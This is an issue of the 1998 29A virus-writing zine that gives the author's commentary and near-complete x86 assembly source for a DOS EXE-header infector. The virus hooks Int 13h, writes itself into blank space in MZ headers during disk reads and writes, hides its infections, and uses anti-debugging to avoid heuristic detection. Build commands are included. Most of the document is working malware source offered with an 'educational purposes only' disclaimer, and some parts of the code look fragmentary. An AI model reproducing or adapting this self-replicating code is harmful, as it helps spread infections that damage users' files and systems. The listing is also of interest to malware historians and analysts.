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29A Issue 03 06 11
comment ^
(c) 1998 by Jacky Qwerty/29A.
Ok, I had never written an ExeHeader virus, so I wrote this. It's a simple
DOS EXE infector which spreads by inserting itself through the blank spaces
of the exe header left by several compilers and assemblers. It basically
converts an EXE file into a COM image, hooks Int 13h and monitors disk
reads/writes at the sector level. When "something" looks like an MZ header
the virus looks for enough blanks in such header and copies itself to there.
The virus is "full stealth" and doesn't infect EXE files larger than 64 Kb
for obvious reasons. It neither infects windows or device driver EXE files
in favor of stability. Needless to say, this virus has no chances to spread
wildly, since 1) It's a DOS virus and remember DOS is dying, if not dead
already heh, and 2) Have you ever seen plenty of such EXE files < 64 Kb ?
This virus, like any other virus that hooks Int 13h for "file" stealthing,
may have problems with cache drivers such as Smartdrive, Norton cache, etc.
if the "stealth" routine is not handled/programmed properly. Virus size was
first option so... The virus also employs a nifty antitracing/antidebugging
routine to avoid heuristic detection in memory.
To build
ml /c numb.asm (tasm is also ok)
link numb,
Greets go to
All VXers..... all of you who write creative viruses with/or fancy payloads.
Virusbuster... you should charge as a sentimental adviser man! #;).
Lord Julus.... a class apart VXer, keep up the good work dude!
This source code is provided for educational purposes only. The author is
NOT responsible in any way for problems it may cause due to improper use!
(c) 1998. Jacky Qwerty/29A.
.model tiny
PSP_b = 100h
v_b = v_end-v_start
v_w = (v_b+1)/2
v_p = (v_b+15)/16
stack_b = 100h
mem_b = (PSP_b+v_b+stack_b) and -2
mem_p = (mem_b+15)/16
jump = 0b3h
mark = (jump shl 8)+0e9h
org 0h
jmp v_start
org jump+3
v_start: mov bp,8
mov di,100h
mov si,ds
lea dx,[si+10h]
add [bp-8+di-100h+10eh],dx
mov bx,[bp-8+di-100h+118h]
mov cx,[di-100h+106h]
add [di-100h+116h],dx
lea si,[bx+di]
jcxz no_relocs
fix_relocs: lodsw
xchg ax,bx
add ax,dx
add ax,[di-100h+bp-8+108h]
mov es,ax
add es:[bx],dx
loop fix_relocs
no_relocs: mov ax,[bp-8+2]
and si,cx
mov cl,(200h-4)/2
lea bx,[bp-8+di-100h+high_mem-start]
add ax,-20h
xchg si,di
push ax
add dx,[si-100h+bp-8+108h]
mov es,ax
push bx
push si
rep movsw
push ds
xor si,si
dec cx
xchg ax,cx
int 13h
xchg ax,cx
jcxz i_was_here
push es
mov ds,si
lea ax,[bp-8+si-0+47h]
push ax
xchg ax,[si-0+4ch]
pop ax
mov bx,ss
dec bx
push ax
xchg ax,[si-0+4eh]
pop di
mov ds,bx
add word ptr [di-47h+3],-20h
pop ds
mov [bp-8+si-0+2],es
mov si,offset low_code
push di
lea cx,[bp-8+di-47h+low_code_size/2]
mov [si+vir_seg-low_code],es
pop es
rep movsw
i_was_here: pop es
pop di
db ?
low_code: push ax
pop ax
and ah,0feh
push ax
pop ax
db 0eah
dw offset new_int13
vir_seg dw ?
low_code_size = $-low_code
high_mem: push cx
mov ds,dx
mov ax,[bp-8+di-100h+104h]
pop si
mul di
xchg ax,cx
push es
rep movsw
pop ds
mov ah,0dh
int 21h
mov ss,cs:[bp-8+0eh]
mov sp,cs:[bp-8+10h]
jmp dword ptr cs:[bp-8+14h]
lea di,[bx+si]
mov cl,v_w
sub word ptr [bx],'ZM'- mark
;rep movs word ptr es:[di], word ptr cs:[si]
db 2eh
rep movsw
xchg cl,[bx+2]
mov [di+old_byte-v_end],cl
pop cx
push cx
sub ax,-301h
push cs
call other
jmp short check
push ax
push -1
inc sp
dec sp
pop ax
inc ax
pop ax
jnz retf_2
inc ax
jz retf_2
dec ax
test ah,0fch
jnz other
test ah,0b6h
jz other
push cs
mov cs:[sectors],al
call other
jc retf_2
push ds
push cx
check: mov ax,-'ZM'
push es
pop ds
add ax,[bx]
jz mark_or_mz
sub ax,mark -'ZM'
jnz end_rd_wr_ok
inc ax
mark_or_mz: cmp byte ptr [bx+18h],40h
jnc end_rd_wr
mov si,v_start-start
dec ax
mov cx,v_w
lea di,[bx+si]
jz chk_mark
infect_mz: cmp ax,[di+start-v_start+200h]
jz end_rd_wr_ok
cmp word ptr [bx+4],7fh
ja end_rd_wr_ok
inc ax
repz scasw
jnz end_rd_wr_ok
test dl,dl
jns flop
mov cl,0
sectors = byte ptr $-1
loop flop
chk_mark: cmp word ptr [di],1234h
org $-2
mov bp,8
org $-1
jnz end_rd_wr_ok
mov si,[di+old_byte-v_start-1]
rep stosw
mov [bx+1],si
xor word ptr [bx],'ZM' xor ((mark and 00ffh) or 0cb00h)
end_rd_wr_ok: clc
end_rd_wr: pop cx
pop ds
retf_2: retf 2
db 0eah
dd ?
end start